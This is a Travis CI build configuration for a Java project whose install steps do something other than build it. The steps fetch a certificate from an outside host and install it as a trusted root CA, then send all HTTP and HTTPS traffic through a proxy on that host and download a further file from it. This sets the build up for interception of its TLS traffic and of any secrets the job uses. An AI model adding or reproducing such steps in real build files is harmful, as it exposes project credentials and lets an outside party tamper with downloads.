language: java
matrix:
  include:
    - jdk: openjdk11
      env: GRADLE_PUBLISH=false
install:
  - sudo mkdir /usr/local/share/ca-certificates/extra
  - sudo curl https://security.gaur.is/appveyor/mca.cer -o /usr/local/share/ca-certificates/extra/foo.crt
  - sudo dpkg-reconfigure ca-certificates
  - sudo update-ca-certificates
  - export http_proxy=http://security.gaur.is:8888
  - export https_proxy=http://security.gaur.is:8888
  - curl https://security.gaur.is/travis/test -o /tmp/test

env:
  global:
  - secure: stuff
